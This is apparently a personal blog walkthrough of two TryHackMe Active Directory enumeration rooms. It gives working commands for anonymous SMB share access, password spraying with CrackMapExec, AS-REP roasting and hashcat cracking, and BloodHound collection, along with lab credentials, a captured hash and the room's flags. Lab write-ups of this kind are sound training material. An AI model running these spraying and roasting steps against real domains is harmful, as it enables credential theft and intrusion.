AD: Basic & Authenticated Enumeration TryHackMe Walkthrough
TL;DR Walkthrough of the TryHackMe rooms AD: Basic Authentication and AD: Authenticated Enumeration. Neither room was very long, so I combined them into one walkthrough.
AD: Authenticated Enumeration room
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
I am going through a suggested learning path currently, knocking out rooms I hadn’t already done and brushing up on topics like webapps that I suck at. These two AD enumeration rooms are new. I didn’t see any walkthroughs for them yet, so I figured I might as well write one.
Both rooms consist of a very small domain with two systems:
10.211.11.20 Workstation
10.211.11.10 DC
Without further ado, let’s get started.
— — Task 1 — -
I am ready to begin exploring unauthenticated enumeration.
No answer needed
— — Task 2 — -
What is the domain name of our target?
sudo nmap -sV -O 10.211.11.10tryhackme.loc
What version of Windows Server is running on the DC?
Windows Server 2019 Datacenter
— — Task 3 — -
What is the flag hidden in one of the shares?
THM{88_SMB_88}
The VM allows anonymous, unauthenticated enumeration so we can gather quite a bit of information.
enum4linux 10.211.11.10Shares:
- AnonShare
- SharedFiles
- UserBackups
Lockout Duration = 2 min
Lockout Threshold = 10
smbclient \\\\10.211.11.10\\SharedFiles -NThis just has a .txt file with a USB story.
smbclient \\\\10.211.11.10\\UserBackups -N
ls
more flag.txtTHM{88_SMB_88}
smbclient \\\\10.211.11.10\\AnonShare -NThis share was empty.
— — Task 4 — -
What group is the user rduke part of?
enum4linux 10.211.11.10 > DomainEnum.txtWe then just Ctrl +F to search the text file.
Domain Users
What is this user’s full name?
Raoul Duke
Which username is associated with RID 1634?
1634 is 0x662 in hex, so just Ctrl + F and we find:
katie.thomas
— — Task 5 — -
What is the minimum password length?
7
What is the locked account duration?
2 minutes
This information also comes from enum4linux.
Perform password spraying using CrackMapExec. What valid credentials did you find? (format: username:password)
crackmapexec smb 10.211.11.10 -u TryHackMeUsers.txt -p PasswordsToTry.txt --continue-on-successtryhackme.loc\rduke:Password1!
I copy/pasted the portion of DomainEnum.txt that contains all the usernames, then parsed out the SamAccountNames in PowerShell.
$Lines = Get-Content ".\Users.txt"
ForEach($Line in $Lines)
{
($Line.split("\")[1]).split(" ")[0] | Out-File .\TryHackMeUsers.txt -Append
}I copy/pasted the passwords TryHackMe suggested using into PasswordsToTry.txt.
Please note; if you copy/paste the files themselves from Windows to Kali then you will get errors in crackmapexec. Open the files, hit Ctrl + A -> Ctrl + C and copy/paste the contents of the files into a freshly created blank file on Kali.
— — Task 6 — -
It is time to proceed to the next room, AD: Authenticated Enumeration.
No answer needed
Note that we can RDP into the domain client VM using the credentials we just found.
xfreerdp /v:10.211.11.20 /u:rduke /p:Password1\! /dynamic-resolutionThese credentials work in the next room as well. Pretty handy.
— — AD: Authenticated Enumeration — -
— — Task 1 — -
I am ready to begin exploring authenticated enumeration.
No answer needed
— — Task 2 — -
What flag must be set on an AD account for it to be vulnerable to AS-REP Roasting?
UF_DONT_REQUIRE_PREAUTH
Which tool automatically identifies roastable users without needing a username list?
Rubeus
What is the Hashcat mode used to crack AS-REP hashes?
18200
What is the password of the user asrepuser1?
We went over how to ASREPRoast and how to mitigate it here.
/usr/share/doc/python3-impacket/examples/GetNPUsers.py tryhackme.loc/ -no-pass -usersfile /home/kali/Downloads/Users2.txtWe get a hit.
$krb5asrep$23$asrepuser1@TRYHACKME.LOC:668c316eb42243f5da0bbb2098c5f4b1$1e4e04a64f50c8b8aed7ca2bd6cf8ca3a37ea5fe2ee46392f40bb943851b6d93eace155858a86c526d27cc1fa63e6bb3bf4b86be07a24cbe40f39c11351e9e2d58dcde9147442917f89d96c0ab30358ad28372f5e160dce3b6a2415a0cad8ebdbf4c161de344b091de50760f17935c50912d8107b4520f522fe94a9040cdabaa49367d4d5564e45880c9f3cdac1018ff7007790e70d8a9e66a6cc2e1532eeaccb6d129888abcb2764cf795a7b3bb79c852d8f157a18ad2d24653900dce7d2527acc129bb89190cef964aafc8f9c8c2b2017ccb5b70a14d29cd194686ddae98f72442a6e8f76ab64c33f5097fa71b
Copy/paste the output into ASREPRoasted.txt and crack it.
hashcat -m 18200 /home/kali/Downloads/ASREPRoasted.txt /usr/share/wordlists/rockyou.txtasrepuser1 / qwerty123!
— — Task 3 — -
How many domain user accounts are there?
I simply used the credentials we got earlier in the Basic Enumeration room.
xfreerdp /v:10.211.12.20 /u:rduke /p:Password1\! /dynamic-resolution(Get-ADUser -Filter *).Count31
#Alternate method, using legacy cmd.exe commands
net user /domain31
What is the full name of the user rduke?
(Get-ADUser rduke -Properties *).DisplayNameRaoul Duke
How many local user accounts are there on the WRK machine?
(Get-LocalUser).Count5
How many domain groups are there?
(Get-ADGroup -Filter *).Count54
The legacy cmd query gives the number that TryHackMe wants.
net group /domain21
— — Task 4 — -
What is the distinguishedName value of the asrepuser1 account?
xfreerdp /v:10.211.12.20 /u:rduke /p:Password1\! /dynamic-resolution(Get-ADUser asrepuser1).DistinguishedNameCN=asrepuser1,CN=Users,DC=tryhackme,DC=loc
According to the “All Domain Admins” query, how many users are part of the Domain Admins group?
(Get-ADGroupMember "Domain Admins").Count5
TryHackMe wants the answer 4 however as they are not counting the builtin Administrator account, aka SID 500.
What is the type of relationship (edge) between the DRGONZ0 account and the DOMAIN ADMINS group?
We went over how to get BloodHound up and running on both Windows and Kali here.
mkdir /home/kali/Downloads/AD_Auth_Enum
cd /home/kali/Downloads/AD_Auth_Enum
sudo bloodhound-python -d tryhackme.loc -u rduke -p Password1\! -ns 10.211.12.10 -c all
bloodhoundUpload the files in AD_Auth_Enum and query in BloodHound.
MemberOf
— — Task 5 — -
How many computer accounts were you able to find?
xfreerdp /v:10.211.12.20 /u:rduke /p:Password1\! /dynamic-resolution(Get-ADComputer -Filter *).Count2
How many groups did Get-DomainGroup “*admin*” return?
(Get-ADGroup -Filter {Name -like "*admin*"}).Count13
— — Task 6 — -
I have taken note of the various tools present in this room.
No answer needed
Summary
I was curious why ‘net group /domain’ was returning a much shorter list than ‘Get-ADGroup’. I copy/pasted the output of ‘net group /domain’ into Notepad and saved it as Legacy.txt, then compared the two commands.
$New = (Get-ADGroup -Filter * -Properties *).CN
Compare-Object -ReferenceObject $New -DifferenceObject (Get-Content .\Desktop\Legacy.txt)
There’s our answer; ‘net group /domain’ doesn’t list the default groups that are in the Builtin container.
I am not sure why this room insisted on including a task centered around legacy cmd.exe commands, or wanted a partial list of groups as the answer to a question.
Not counting Administrator as a member of Domain Admins in Task 4 is also an odd choice. The account is a user and is a member of Domain Admins after all.
TryHackMe rooms are just janky sometimes. Thankfully it’s not often, and normally pretty easy to work around. Given the price of their subscription I won’t complain much.
References
Howto setup BloodHound: https://happycamper84.medium.com/howto-setup-bloodhound-map-ad-44c7149ba28b
Howto ASREPRoast: https://happycamper84.medium.com/forging-tickets-abusing-trust-4f1741256ca1
Howto Kerberoast: https://happycamper84.medium.com/kerberoasting-over-an-open-fire-3b604e4c52f2
